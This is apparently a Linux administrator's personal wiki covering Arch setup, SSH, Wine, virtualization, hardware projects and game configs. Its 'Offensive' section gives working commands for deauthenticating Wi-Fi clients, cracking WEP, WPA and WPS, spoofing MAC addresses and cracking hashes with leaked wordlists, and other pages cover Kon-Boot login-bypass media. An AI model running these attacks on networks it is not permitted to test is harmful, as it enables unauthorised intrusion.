Wiki

My wiki

Start

About

This wiki is supposed to document my knowledge and setup so I don't have to look things up twice. Since you stumbled upon it, I hope it helps you!

Keep in mind that the wiki is permanently under construction. Information might be wrong, incomplete, ... I'm not exactly getting paid to keep it up to date.

Backup of the wiki's contents is here.

List of all pages

Contact me

If you wish to contact me, you can do so at the following places:

You will get the fastest response via Telegram and email.

SSH pubkeys:

ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIKhUhbEr20+N3qDkkPkVDlBB+Ke+eomGfXIhtRd5MLGT root@ansible
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIIufCM34eXtzcLG4cR/UrHFcAQf+x9/xOCwG+SVPD0LH c0rn3j@Luxuria
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAILPSK/vU1jMRA3TCttiqNA1OSv4BOPOU6rLwoX5fM2rL u0_a240@Redmi9T

Donate

If I saved you some time, you can send a pizza my way by PayPal or pledge on the ghost town that is my Patreon account.

CV

Martin Rys

I am a Linux systems administrator born and currently living in Czechia.

My hobbies are reverse engineering, embedded electronics, and creating and self-hosting various services.

My hobby projects are mostly available on Gitlab.

Work experience:

Education:

Technical background:

Other:

Software

This page is a list of software I use.

I denote the license in brackets. I try to stick with software that is free and open-source; if a piece of software is not FOSS, I mark it red, as I do not want to recommend such software, but it is what I am stuck with.

PC

Windows only

Linux only

Android

Browser addons


Hardware

List of all the hardware I'm using and what I'm using it for.

Also has stuff of others that I want to keep track of.

Czechia

Mine

Networking

Peripherals and Other

PC

PC

Laptop

Laptop

Phones

Spares

Puzzles

Others

Services

Public

Private

Commercial

RSS

This is a list of my feeds on https://rss.rys.pw that serves as a backup

Monitoring

Monitoring commands for monitoring.rys.pw

'/usr/lib/monitoring-plugins/check_http' '--hostname=a4.rys.pw' '--ssl=1.2+' '--string=Enter output'
'/usr/lib/monitoring-plugins/check_http' '--hostname=analytics.rys.pw' '--ssl=1.2+' '--string=Sign in - Matomo'
'/usr/lib/monitoring-plugins/check_http' '--hostname=auth.rys.pw' '--ssl=1.2+' '--string=Keycloak' '--url=/auth/'
'/usr/lib/monitoring-plugins/check_http' '--hostname=www.bloody.com' '--string=V2020.0930' '--timeout=30' '--url=/en/download.php?id=6'
'/usr/lib/monitoring-plugins/check_http' '--expect=403' '--hostname=books.rys.pw' '--ssl=1.2+' '--string=Keycloak'
'/usr/lib/monitoring-plugins/check_http' '--hostname=cloud.rys.pw' '--ssl=1.2+' '--string=a safe home for all your data' '--url=/login'
'/usr/lib/monitoring-plugins/check_http' '--hostname=haste.rys.pw' '--ssl=1.2+' '--string=Duplicate & Edit'
'/usr/lib/monitoring-plugins/check_http' '--hostname=ip.rys.pw' '--ssl=1.2+' '--string=Your IPv4'
'/usr/lib/monitoring-plugins/check_http' '--hostname=lyrics.rys.pw' '--ssl=1.2+' '--string=her hips' '--url=/?title=six%20shooter'
'/usr/lib/monitoring-plugins/check_http' '--hostname=mail.rys.pw' '--ssl=1.2+' '--string=Roundcube Webmail' '--url=/webmail/'
'/usr/lib/monitoring-plugins/check_tcp' '--hostname' 'mumble.rys.pw' '--port' '64738'
'/usr/lib/monitoring-plugins/check_http' '--hostname=paste.rys.pw' '--ssl=1.2+' '--string=zero knowledge'
'/usr/lib/monitoring-plugins/check_http' '--hostname=ping.rys.pw' '--ssl=1.2+' '--string=Network Latency'
'/usr/lib/monitoring-plugins/check_http' '--hostname=radio.rys.pw' '--ssl=1.2+' '--string=Matomo'
'/usr/lib/monitoring-plugins/check_http' '--hostname=rss.rys.pw' '--ssl=1.2+' '--string=Main stream · FreshRSS' '--url=/i/'
'/usr/lib/monitoring-plugins/check_http' '--hostname=rys.pw' '--ssl=1.2+' '--string=Hardware'
'/usr/lib/monitoring-plugins/check_http' '--hostname=speedtest.rys.pw' '--ssl=1.2+' '--string=LibreSpeed'
'/usr/lib/monitoring-plugins/check_tcp' '--hostname' 'syncplay.rys.pw' '--port' '8999'
'/usr/lib/monitoring-plugins/check_http' '--hostname=text.rys.pw' '--ssl=1.2+' '--string=AGPL'
'/usr/lib/monitoring-plugins/check_http' '--hostname=wekan.rys.pw' '--ssl=1.2+' '--string=meteor_js'

Arch Linux

I use Arch Linux (or the spinoff ARM version) on practically all my machines.

Download

You can download Arch here

Basic commands and usage

Before going through the install guide you really should know these.

Lower/upper case is important in Linux.

You can use arrow keys to navigate through your previous commands.

CTRL+ALT+F1-F12 - key combination for switching between terminals

cd DIRECTORY - for example cd /home/baf/Downloads - chooses directory

nano FILE - edit a text file

CTRL + C - break from a command, for example a ping

lsblk - lists all your drives and their partitions.

irssi - IRC in the CLI in case you get lost, #archlinux on Libera should help you out if you ask nicely.

Installing GPU proprietary drivers

Nvidia

sudo nano /etc/pacman.conf - uncomment [multilib] and the line below it. This is required for 32bit applications.

sudo pacman -Syu - synchronize the repository databases and update the system's packages

sudo pacman -S nvidia nvidia-libgl lib32-nvidia-libgl nvidia-settings

reboot

AMD

Do not use Catalyst. If you think you have to, rather get another GPU.

Table of hardware with needed drivers is here.

Installing packages from AUR

You can download user created PKGBUILDs from the AUR.

Package managers

Pacman

Usage: tldr pacman + the rest of this page:

-S has a useful --ignore packagename flag, which lets you ignore a broken package when doing a full update for example. Use multiple times when you want to avoid installing more packages. There's also a --noconfirm flag, which ignores confirmation of actions.

pacman -Qm - List packages installed locally.(that includes AUR)

You can get to the package cache via this command cd /var/cache/pacman/pkg/ and then use pacman -U packagename to downgrade/reinstall a package.

Converting Wii's Bluetooth module to a USB dongle

Original thread on Dolphin forums

Video

This page assumes no previous soldering knowledge whatsoever.

If you want perfect connection of real Wii motes to the Dolphin emulator, you want to pass-through one of the original chips to Dolphin.

There are two chips, the older 4250A-WML-C43 and the newer J27H002. The only difference between those seems to be that the newer version has slightly smaller test pads, but they're pretty small on both versions, so it's not going to make your job too much easier by choosing one over the other.

j27h002-4250a-wml-c43-bluetooth-module-board-for-nintendo-wii-replacement-part.jpg_640x640.png

Both chips go for about $1.3 a pop on Aliexpress.

List of things you'll need for this -

When you're done and you get the USB dongle to show up when connected, follow the Bluetooth Passthrough wiki page.

I will not be wiring the sync button as you can just use the software button in Dolphin when connecting the Wii motes, so essentially just ignore the button on the following schematic. If you want it there you're free to wire it up of course.

dolphin_bt_chip_schema.jpg

wii_bt_full_schematic.jpg

usb-a_and_b_schematic.jpg

  1. Solder the 4 wires to the USB-A connector and pull the cables through the plastic cover. Red for +, black for -, green for Data+ and white for Data-
  2. Continuity test - make sure none of the 4 pins is connected to its nearby pin(s) and that all pins are connected to the wires
  3. Pull the plastic cover onto the USB connector hard so it stays in place
  4. Put a shrink tube on USB(-) and pull another black wire through it, solder both to regulator GND. You should twist the wire ends together when soldering two at the same time
  5. Take two red wires and solder them to regulator output, put a shrink tube on them
  6. Put a shrink tube on USB(+) red wire and solder the wire to regulator input
  7. Continuity test the 2 pairs of wires on the regulator
  8. Pull the shrink tubes up and heat them under fire
  9. If you're using liquid flux like I am, pour it on the pads, let it be there for a short while then dry it up (or don't dry it if your flux doesn't turn into charcoal when heated up like mine does)
  10. If you don't have properly colored wires for Data+ and -, continuity test which wire is which and solder them onto the BT chip
  11. The 2 output red wires are because there's 3 output pads total (orange) - you need to connect all 3 together. One wire goes to the singular left pad, and other wire goes between the 2 right pads and you bridge those together
  12. Solder the remaining GND and you're done soldering
  13. Clean your iron on the damp sponge, put some solder on the tip and turn it off. This prevents degrading the tip.
  14. Test the dongle you made in a computer
  15. Finally hot glue the connections on the BT chip so they don't come off in case they get tugged on hard
  16. Put the connector on the USB dongle and hot glue it, hot glue the regulator from the other side
  17. With a working adapter, follow Dolphin's BT passthrough page

Creating a bootable flashdrive

To create a bootable flashdrive for Windows you'll need an 8GB+ flash drive. For Linux, it depends on the distribution. You should be fine with 1GB for Arch, but hey, 16GB flash drives are like $5 today.

Keep in mind that the flash drive can either be (U)EFI bootable, BIOS bootable(often named legacy in UEFI options) or both.

To actually boot from the flash drive, go into your UEFI/BIOS settings and either find the option to boot directly from the flash drive, or rearrange your boot order to boot from flash drive first.

On Windows

Linux or Windows images

Rufus - Rufus usually has no problem working with Linux and Windows ISOs and is easy to work with. The only negative thing is that I didn't figure out how to make ISOs that boot both under BIOS and UEFI, only one or the other, which is selected under the "Partition scheme" label.

You want to use "GPT for UEFI" partition scheme unless your hardware is years and years old.

unetbootin - Sometimes certain Linux distributions fail to be used by Rufus

On Linux and macOS

macOS has some command name differences not mentioned here, but the general idea works still.

Linux images

unetbootin or dd can be used for this purpose. I chose to use dd because it's preinstalled and straightforward.

Make sure to run lsblk to know what device you should be dealing with.

umount /dev/sde1 - Unmount the device in case it's mounted

sudo dd if=/path/to/file.iso of=/dev/sde bs=4M status=progress && sync

You should now be able to boot the distribution in both BIOS and UEFI, if the distribution supports it.


Windows images

Below is a description of the manual process, however you can use WoeUSB for an automated one.



This handy script does the below-described process:

Format the flash drive with Gparted - Device > Create partition table - Set partition table to msdos. Afterwards create a FAT32 partition and remember to label it; labeling is optional if you want to keep only one OS on the flash drive, but probably required for more.

Right click the partition you created > Manage flags > tick the 'boot' flag. Exit gparted.

Mount the ISO you want to use to some already existing folder

sudo mount -o loop ~/Downloads/Win8.1_English_x64.iso /mnt/iso

and copy all files from it to the mounted flash drive. The exclude is there to support Win10 1809+ images which have over 4GB install.wim which needs to be split:

rsync -rv --progress --exclude=install.wim /mnt/iso/ /run/media/c0rn3j/WINDOWS/

wimsplit /mnt/iso/sources/install.wim /run/media/c0rn3j/WINDOWS/sources/install.swm 3000

At this point the flash drive should be UEFI bootable. You're likely done here, but if you have a very old machine, the rest is needed to also enable BIOS booting.

Also you should create a file ei.cfg in the sources folder with following content(it makes sure you can actually select the edition):

[Channel]
Retail

sudo grub-install --target=i386-pc --boot-directory=/run/media/c0rn3j/WINDOWS/boot /dev/sdd - This command will install GRUB bootloader on the flash drive.

Last thing you'll need to do is create a config file for GRUB.

gedit /run/media/c0rn3j/WINDOWS/boot/grub/grub.cfg - This command will run gedit, paste the following text block in it and save it. Remove the label part if you didn't set one.

default=1
timeout=15
color_normal=light-cyan/dark-gray
menu_color_normal=black/light-cyan
menu_color_highlight=white/black
menuentry "Start Windows Installation" {
    insmod ntfs
    insmod search_label
    search --no-floppy --set=root --label WINDOWS --hint hd0,msdos1
    ntldr /bootmgr
    boot
}

The flash drive should now be bootable by both UEFI and BIOS.

KON-BOOT images

Format the flash drive with Gparted - Device > Create partition table - Set partition table to msdos. Afterwards create a FAT32 partition, remember to label it.

Copy the EFI folder onto the new partition.(you may need to rename it to lowercase efi?) Copy the files in USBFILES folder onto the new partition.

sudo grub-install --target=i386-pc --boot-directory=/run/media/c0rn3j/KONBOOT/boot /dev/sdd - This command will install GRUB bootloader on the flash drive.

sudo cp /usr/lib/syslinux/bios/memdisk /run/media/c0rn3j/KONBOOT/boot/grub/ - copies memdisk onto the flashdrive - needed for BIOS booting.

gedit /run/media/c0rn3j/KONBOOT/boot/grub/grub.cfg - create the following grub entry

 menuentry "Konboot" {
 linux16 /boot/grub/memdisk
 initrd16 /konboot.img
 }

Note: Konboot v2.5 does not seem to work on anything past the first W10 RTM build.

Using Android to emulate mass storage

You can boot images straight off your phone if you've root permissions.

Usb Mountr was one of the FOSS solutions, but it was dropped by the maintainer.

DriveDroid is supported but proprietary.

Your kernel might support emulating USB, emulating CD drive or both.

Dolphin

Info

Dolphin is an emulator, community/dolphin-emu on Arch.

If you have real Wii motes: Dolphin uses its own drivers so do not install xwiimote or anything similar, do not use bluetooth GUI or anything, simply connect a bluetooth dongle and start the BT service via

sudo systemctl start bluetooth

if it isn't on already. Go to Controllers in dolphin-emu, set at least one Real Wiimote and check continuous scanning. On pressing 1+2 or the red sync button the controller should connect and vibrate.

All Chinese BT dongles will likely not work properly, throwing various errors at you when you try to use them with Dolphin.

Note: The wii motes can glitch out - you will need to take out the batteries for a second to get them to connect again.

You need to add the ISO directory with your game ISO files. To do so, go to Config > Paths > Add... and select the directory.

You may want to go to Graphics > Enhancements and set the resolution to auto and use some AA and/or Anisotropics Filtering.

You should also go to controllers and check that the GC/Wii controllers are configured(You can always reset them to default).

Dolphin-emu has an awesome feature called Netplay, allowing you to play the games with your friends over the internet even though the games were meant to be played locally only! For that you'll need to have the exact same Dolphin-emu version, exact same ISO file(check file hash to know you do) and same Memory card save if you intend to use that.

Sadly Netplay doesn't work with real Wiimotes(yet...).

BT dongles

From my experience: some just don't work, some work weirdly, I'll try to list what I bought and where and how it works. None store-bought work truly well.

Dongle #1 - Works weirdly but after messing around with it for a bit I got both my wii motes to connect. Would not recommend.

Dongle #2 - Does not work with Dolphin.

Dongle #3 - works perfectly but I don't have an exact link, looks exactly like Dongle #2 but without any text on it or "golden" connector. Seems like it's USB 2.0 V2.0 BT dongle.

The only really functional option is to make your own from a Wii BT chip

Games

CS:GO

CSGO_Game_Mode_Commands

Figuring out wallbangs n stuff:

mp_buy_anywhere 1;mp_buytime 60000 
mp_maxmoney 65535;mp_startmoney 65535;mp_afterroundmoney 65535
mp_roundtime_defuse 60;mp_roundtime_hostage 60;mp_roundtime 60;mp_restartgame 1 

Danger zone bunny hop practice:

game_mode 0; game_type 2; map dz_sirocco
sv_cheats 1; sv_infinite_ammo 1; sv_regeneration_force_on 1
mp_autokick 0; mp_disable_autokick; bot_kick all
# MP (use changelevel instead of map above)
mp_respawn_on_death_ct 1; mp_respawn_on_death_t 1

exojump; give weapon_bumpmine; give weapon_knife

Crosshair(bad):

CSGO-F3pjS-84KDh-s7t54-W8m37-VVFyB

Interesting resources

Punycode attack on browser URLs - https://www.аррӏе.com/

From 0x90 to 0x4c454554, a journey into exploitation

Email spoofing

Teaching

Stolen from a Reddit comment somewhere:

  1. Test - before starting any topic, make sure your student has a grasp of the prerequisites by giving them simple tasks. Just because you have taught them the prerequisites a week ago does not mean that they didn't forget.

  2. When you are teaching them, talk as little as possible. The only thing you should be saying is the concepts.

  3. Ask lots of questions. I.e.: What is an object (expect them to repeat what you told them); What happens if (insert 10x different cases). Teach by asking.
    I can't emphasize this enough. When I teach, I never say more than 2 sentences without asking a question. Because you quickly realize that people have a hard time retaining more than 2-3 sentences at a time.

  4. Set 0 expectations. If you get frustrated it's because you have expectations. Many people have self confidence issues. Being disappointed will cause your students emotional stress and they will not be able to learn. They might start to avoid asking you questions...

  5. Listen. Many times, your students could be saying what you wanted to hear, but worded differently. Their analogy could have the same concept as yours but very different. Learn to recognize what students are saying.

Minecraft

From time to time I host a server for myself and a few friends, but new people are welcome too!

It's down most of the time.

Info

Installation

Notes

Clear all items on the ground - /kill @e[type=Item]

Where to get Forge

Main place to get mods. Rarely, some mods won't use Curseforge but a build server or a webpage (IC2 for example)

-Xms is startup memory and -Xmx is maximum allowed memory. -Xms8G -Xmx8G - makes Minecraft start with 8GB and will let it allocate memory up to 8GB as needed... This is useful as reallocation is costly so let's just go with max.

# Will install/update server + forge in the current directory.
java -jar forge-*-installer.jar --installServer

Modlist

Server setup

Offensive

Rubber Ducky

Screw the $45~ thing, we're making our own for $1.15~.

https://hackernoon.com/low-cost-usb-rubber-ducky-pen-test-tool-for-3-using-digispark-and-duck2spark-5d59afc1910

https://github.com/PlatyPew/Digispark-Duckduino

https://github.com/mame82/duck2spark

https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payloads

Open Arduino IDE; File -> Preferences -> Additional Boards Manager URLs http://digistump.com/package_digistump_index.json

Tools -> Board -> Boards Manager -> Digistump AVR Boards - install it.

# cat > /etc/udev/rules.d/49-micronucleus.rules << EOF
SUBSYSTEMS=="usb", ATTRS{idVendor}=="16d0", ATTRS{idProduct}=="0753", MODE:="0666"
KERNEL=="ttyACM*", ATTRS{idVendor}=="16d0", ATTRS{idProduct}=="0753", MODE:="0666", ENV{ID_MM_DEVICE_IGNORE}="1"
EOF

reboot

You can now flash stuff to the board by selecting it as 'Digispark Default 16.5mhz'.

Do not plug the board before compiling process, do it after when you'll be prompted.

## This seems not needed anymore as the AVR package ships up to date micronucleus, and the project stopped providing precompiled linux library?
#git clone https://github.com/micronucleus/micronucleus.git
#cp ~/micronucleus/commandline/micronucleus /home/c0rn3j/.arduino15/packages/digistump/tools/micronucleus

General

http://tools.kali.org/tools-listing

Hashcat

Hashcat is a tool to crack various hashes, passwords and other formats. Hashcat is now merged into one OpenCL version (there used to be a CUDA version for Nvidia GPUs, CudaHashcat; the new hashcat only supports OpenCL).

For WPA2 it uses a new(2017) format called hccapx.

Attacking 802.11


http://tools.kali.org/wireless-attacks/mdk3

Preparation:

Packages: aircrack-ng wireshark-qt macchanger reaver-wps-fork-t6x


Kill your network manager service to avoid it interfering.

I am using NetworkManager.

sudo systemctl stop NetworkManager - sometimes it starts again so just try this twice...

Then use sudo airmon-ng to find out your interface name for the wireless card you want to use. If it is not listed, you are either lacking drivers or it is not compatible.

After finding out your interface name, turn your WLAN card into monitor mode with sudo airmon-ng start yourInterface; you will then have a yourInterfacemon interface you can use. You can use the --verbose flag with the command to diagnose possible issues if it is not working as intended. You can use stop instead of start to make the interface go back to managed mode and use Wi-Fi as usual.

Since the default interface tends to be wlp8s0, that is what I am going to use for this page.


Change your MAC:

macchanger -r wlp8s0 - randomize MAC address completely. Alternatively use -m option and supply an address starting with 68:5D:43 or any other vendor specific address, as some routers and networks will not allow MAC that is not assigned to any vendor. (MAC is in this format XX:XX:XX:YY:YY:YY where XXXXXX is vendor specific and YYYYYY is random)

Wifite

There is a script called wifite that can do most of these attacks even if the attacker doesn't understand them. It fails in some more complicated cases.

git clone https://github.com/derv82/wifite

cd wifite/

sudo python2.7 ./wifite.py

Scan your surroundings

sudo airodump-ng wlp8s0mon

MAC address filtering

Use airodump to look for an active client and change your MAC address to theirs.

Hidden SSID

aireplay-ng -0 0 -a 00:1F:1F:1F:1F:1F -c 00:1F:1F:1F:1F:1F --ignore-negative-one wlp8s0mon

while running airodump. Successfully deauthing a client will make them broadcast the SSID in the clear because they'll have to reconnect.

WEP

airmon-ng start wlp8s0

airodump-ng wlp8s0mon

airodump-ng -w wep -c CHANNEL --bssid BSSID wlp8s0mon

aireplay-ng -1 0 -a BSSID wlp8s0mon

aireplay-ng -3 -b BSSID wlp8s0mon

aircrack-ng filename.cap

WPA/WPA2-PSK

airmon-ng start wlp8s0

airodump-ng wlp8s0mon

airodump-ng -c CHANNEL -w filename --bssid BSSID wlp8s0mon

aireplay-ng -0 0 -a BSSID wlp8s0mon

After obtaining 4-way handshake:

aircrack-ng -w WORDLIST -b BSSID filename.cap

WPA2-MGT MSCHAPv2

http://pastebin.com/CnJstqpH

WPS

Scan for WPS enabled APs

sudo wash -i wlp8s0mon

For Bruteforcing and logging for possible pixie attack. Use -K 1 parameter to try pixiewps while reaver is running. The plain bruteforce attack might take minutes to days, but usually it's max 10 hours.

sudo reaver -i wlp8s0mon -b BSSID -c channel -f -S -vvv -H

After obtaining at least one response you can use pixiewps to try the offline pixie attack. Whole pixiewps command will be saved in a text file if you supplied the -H command. Pixie attack takes anywhere from a second to 30 minutes, and only works if the router is vulnerable to it.

Cracking a handshake/capture file

Using GPU

Converting .cap to .hccapx

Use cap2hccapx (from the hashcat-utils package)

cap2hccapx capture.cap capture.hccapx

HCCAP to password

hashcat -m 2500 -w 1 filename.hccapx wordlist.txt

Using CPU

IVS file crack: aircrack-ng -a2 -b F8:8E:88:AA:FF:BB -w wordlist-final.txt ivsfile.ivs

Other stuff

Find out default gateway: route -n

Obtaining wordlists

hashes.org have awesome leaked lists, so I'm going with a bunch of these. You can find different lists on torrent trackers.

7z x xxx_found.7z -owordlists - extract file into a folder called 'wordlists'

cat xxx_found_sorted.txt xxx_found_sorted.txt xxx_found_sorted.txt > mywordlist.txt - join all lists into one

sed -r '/^.{,7}$/d' mywordlist.txt > WPAwordlist.txt - remove everything that is 7 characters or less from the file and write that to a new file. WPA/2 does not accept less than 8 characters.

sort -T ~ -u WPAwordlist.txt > WPAwordlist_sorted.txt - change temporary directory to the home directory(sort would fail on a big file if /tmp is too small) and sort into a new file

SSH

Packages: openssh

Client config: /etc/ssh/ssh_config

Server config: /etc/ssh/sshd_config

What is SSH?

Notable config options:

Port # default port(22) is sometimes blocked on networks
X11Forwarding # Lets you connect to the X server(forward GUI apps)
Banner # Display a message before logging in(warning messages are required in some countries), file /etc/issue.net is usually used for that. Alternatively you can show a message after login, simply edit /etc/motd for that.
PasswordAuthentication no # Force use of SSH keys
ChallengeResponseAuthentication no # Force use of SSH keys(default set to no?)

sudo systemctl enable --now sshd - Enable sshd service and start it, this is required if you want to host a SSH server so it starts at boot.

By default SSH server accepts user logins(root is disabled by default), but you might want to generate and use SSH keys instead.

Default crypto used is 2048 bit RSA. This is a sane default, you could possibly use 4096 bit RSA(or higher), which has diminishing returns. It takes about 8x more resources to decrypt 4096 RSA than 2048 RSA.

Consider using the newer Ed25519 cipher. Ed25519 is supposedly the best current option. There is no need to set the key size, as all Ed25519 keys are 256 bits. The only problem should be compatibility with old openssh versions.

ssh-keygen -t ed25519 - Generate a keypair - you'll be prompted for a filepath and a password to secure the key. The passphrase uses AES-128 for encryption. You probably don't want to use a passphrase though, so just leave it empty.

ssh-copy-id -i ~/SSHkey.pub -p 1234 hostname.org - Copy the public key to the server via SSH. In the example there is specified file path, port and hostname/IP.

By default the public keys allowed to connect to your machine are saved per line in ~/.ssh/authorized_keys

Cool thing that SSH can do is port forwarding:

Let's say I'm running a webserver on 192.168.122.254. The command below forwards its port 80 (127.0.0.1:80 as seen from that server) to port 20123 on the machine you executed the ssh command on, so you can look at the website via http://localhost:20123 there. You can of course replace the destination host (127.0.0.1) with any other host and forward your traffic through the server just for that website.

ssh -L :20123:127.0.0.1:80 username@192.168.122.254

This is remote mapping instead - executing this would forward the host's port 22 to the remote server's port 20123 - useful if ISP is blocking ports and you want to forward something through another server!

ssh -R :20123:127.0.0.1:22 username@rys.pw
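Where the two forwards above actually listen, as an added example that is not part of the original wiki: per ssh(1), an empty bind address (the leading colon) or '*' asks for a listener on all interfaces rather than loopback only, and for -R the server's GatewayPorts setting in sshd_config decides whether that request is honoured. The function names and the third sample command are constructed for illustration; only the TCP form [bind_address:]port:host:hostport is handled.

```python
import ipaddress
import re
import shlex
from typing import NamedTuple, Optional


class Forward(NamedTuple):
    flag: str        # "L" or "R"
    listener: str    # "client" (-L) or "server" (-R): where the port is opened
    bind: str        # "loopback", "all interfaces", or a literal address
    port: int        # listening port
    dest: str        # host:port the tunnel connects to on the far side
    exposed: bool    # True if other hosts on the network can reach the port


# TCP form only: [bind_address:]port:host:hostport, IPv6 literals in [brackets].
_BIND = r"(\[[^\]]*\]|[^:\[\]]*)"
_HOST = r"(\[[^\]]+\]|[^:\[\]]+)"
_SPEC = re.compile(rf"^(?:{_BIND}:)?(\d+):{_HOST}:(\d+)$")
_GATEWAY_PORTS = ("no", "yes", "clientspecified")


def _requested(bind: Optional[str]) -> Optional[str]:
    """Map the bind_address field to what the client is asking for."""
    if bind is None:                  # field absent: listener's default applies
        return None
    if bind in ("", "*"):             # empty or '*': every interface
        return "all interfaces"
    if bind.lower() == "localhost":
        return "loopback"
    try:
        ip = ipaddress.ip_address(bind.strip("[]"))
    except ValueError:
        return bind                   # some other hostname: keep it literal
    if ip.is_loopback:
        return "loopback"
    return "all interfaces" if ip.is_unspecified else bind


def classify(flag: str, spec: str, gateway_ports: str = "no") -> Forward:
    """Classify one forward. gateway_ports is GatewayPorts on the listening
    side: ssh_config on the client for -L, sshd_config on the server for -R."""
    m = _SPEC.match(spec)
    if flag not in ("L", "R") or m is None:
        raise ValueError(f"unsupported forward: -{flag} {spec}")
    if gateway_ports not in _GATEWAY_PORTS:
        raise ValueError(f"unknown GatewayPorts value: {gateway_ports}")
    bind, port, host, hostport = m.groups()
    asked = _requested(bind)
    if flag == "L":
        # An explicit bind_address wins; otherwise client GatewayPorts decides.
        default = "all interfaces" if gateway_ports == "yes" else "loopback"
        effective = asked or default
    elif gateway_ports == "no":
        effective = "loopback"        # sshd forces loopback, request ignored
    elif gateway_ports == "yes":
        effective = "all interfaces"  # sshd forces the wildcard address
    else:                             # clientspecified: the client chooses
        effective = asked or "loopback"
    return Forward(flag, "client" if flag == "L" else "server", effective,
                   int(port), f"{host}:{hostport}", effective != "loopback")


def audit(cmdline: str, client_gateway_ports: str = "no",
          server_gateway_ports: str = "no") -> list:
    """Find every -L/-R in an ssh command line and classify it."""
    args = shlex.split(cmdline)
    found = []
    for i, arg in enumerate(args):
        if arg[:2] not in ("-L", "-R"):
            continue
        # Accept both "-L spec" and "-Lspec".
        spec = arg[2:] or (args[i + 1] if i + 1 < len(args) else "")
        gp = client_gateway_ports if arg[1] == "L" else server_gateway_ports
        found.append(classify(arg[1], spec, gp))
    return found


# The two commands from the page, plus a constructed loopback-only variant.
SAMPLES = [
    "ssh -L :20123:127.0.0.1:80 username@192.168.122.254",
    "ssh -R :20123:127.0.0.1:22 username@rys.pw",
    "ssh -L localhost:20123:127.0.0.1:80 username@192.168.122.254",
]

if __name__ == "__main__":
    for cmd in SAMPLES:
        for fwd in audit(cmd, server_gateway_ports="clientspecified"):
            state = "EXPOSED" if fwd.exposed else "local only"
            print(f"{state:10} {fwd.listener}:{fwd.port} ({fwd.bind}) "
                  f"-> {fwd.dest}   # {cmd}")
```

With the server's default GatewayPorts no, the -R listener stays on the server's loopback, so reaching it from other hosts needs GatewayPorts set to yes or clientspecified there.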

System Administration

Software

Some tips

GRUB

GRUB on Arch wiki

Get grub to ignore bad devices and install properly:

blockdev --flushbufs /dev/sde && blockdev --flushbufs /dev/sda && grub-mkdevicemap -n

SSH

[[SSH]]

Wine

Dependencies: wine wine_gecko wine-mono winetricks

Wine is used to run Windows only executables on other operating systems. More information about Wine

You can have multiple Windows "installations" which are called prefixes. In fact it is suggested that you use a new prefix for each application you use.

~/.wine is the default wineprefix (a.k.a. "configuration directory" or "bottle"). You can change which prefix Wine uses by changing the WINEPREFIX environment variable (outside Wine). To do this, run the following in a terminal:

export WINEPREFIX=~/.wine-new
wine winecfg

Alternatively, you can specify the wine prefix in each command, e.g.

WINEPREFIX=path_to_wineprefix wine winecfg

You can create a new 32 bit wineprefix using the WINEARCH environment variable (note: you can also export WINEARCH). In a terminal, type:

WINEARCH=win32 WINEPREFIX=~/.wine32bit winecfg

Do not use an existing directory for the new wineprefix: Wine must create it.

Once a 32 bit wineprefix is created, you no longer have to specify WINEARCH in the command line to use it, as the architecture of an existing wineprefix cannot be changed.

You can use wine64 instead of wine to force 64bit.

There are three Direct3D backends for Wine. Which one you use depends on what features your card supports.

wined3d - The D3D backend included with Wine upstream. It is a translation layer that converts Direct3D calls to OpenGL and then sends them to your OpenGL GPU driver. Usable on all GPUs, but has the worst performance.

wined3d with CSMT - A multi threaded, more optimized version of wined3d. It has the same support as wined3d but is much faster. It still incurs a high CPU overhead but if your CPU is good it can help give you better FPS.

Gallium Nine - A native D3D9 implementation that skips the OpenGL translation entirely, requires less CPU overhead, but requires you use a GPU driver which has the GPU side support built in, which are all the Gallium mesa drivers (radeonsi, r600g, nouveau). Nouveau is the open source nVidia driver, but it lacks performance due to reclocking issues and it does not support the GTX10 series because they haven't released signed binaries to support it.

winecfg - > Drives > Autodetect - binds your home folder

Make AppDB reports, it helps the community!

How to install SVP on Arch Linux to play interpolated movies

Dependencies: qt5-3d, mpv-git(AUR), svp(AUR)

Pre-requisites(optional): proprietary GPU drivers already installed.

Download and install mpv-git from AUR

Set up mpv socket -

cat > ~/.config/mpv/mpv.conf << EOF
input-ipc-server=/tmp/mpvsocket # Receives input from SVP
hr-seek-framedrop=no # Fixes audio desync
resume-playback=no # Not compatible with SVP
EOF

Note: There's currently a small bug in SVP causing video stuttering - go to SVP control panel > Utilities > Application settings; and play with the number of "threads" which are set to 0 by default. Setting it to 15 fixed the stuttering issues for me.

That's it, running movies through mpv while having SVP manager turned on will play them smoothly!


Additionally you can install SMplayer, because MPV alone has almost no GUI and relies heavily on CLI commands.

Dependencies: smplayer

Launch SMplayer > open Preferences > Advanced > Options for MPlayer/mpv and add this to Options --input-ipc-server=/tmp/mpvsocket

rsync

Packages: rsync

Needs to be installed on both computers.

Using rsync over SSH and custom port:

rsync -avz -e "ssh -p PORT" path/to/folder/or/file domain.com:/copy/to/folder

-z flag for compression, -r flag for recursive, but that is already implied with -a, which preserves file permissions and such. (-a equals -rlptgoD (no -H,-A,-X))

Use destructive syncing – “rsync --del” – This will delete any items on the destination that are not present on the source.

Virtualization

Hypervisors

Xen

QEMU

KVM

Hyper-V

Virtualization under QEMU/KVM

virt-manager - start the interface. Make sure to do so after you're already connected to the internet, else it might use the wrong interface and you'll have no internet connectivity on the VMs.

virt-manager --no-fork - virtmanager will let you type passwords in the terminal instead of openssh-askpass or something like that

Create a new Virtual Machine using an .ISO image and default settings.

Now you should have a working BIOS VM. To create a UEFI one make sure to check customize install and select UEFI for firmware when creating a new VM.

Bi-directional copy pasting and drag-n-dropping files to a Windows KVM is possible by simply installing spice-guest-tools on the KVM(default virt-manager setup uses Spice for display, so it works out of the box)

To enlarge a .qcow2 image, use the command qemu-img resize ubuntu-server.qcow2 +5G - remember that the added space will end up as unallocated space.


Using LXC/LXD containers

https://wiki.archlinux.org/index.php/LXD

Virtualization under VirtualBox

Packages: virtualbox linux-headers virtualbox-host-dkms

GPU Passthrough

https://www.youtube.com/watch?v=37D2bRsthfI

http://blog.wikichoon.com/2014/07/enabling-hyper-v-enlightenments-with-kvm.html

More stuff

Webserver in current folder

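You can instantly create a webserver hosting the contents of the folder you're currently in via python. It listens on all interfaces and serves every file in the folder without authentication; add --bind 127.0.0.1 if it should only be reachable from the local machine: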

python -m http.server 8080

Tmux

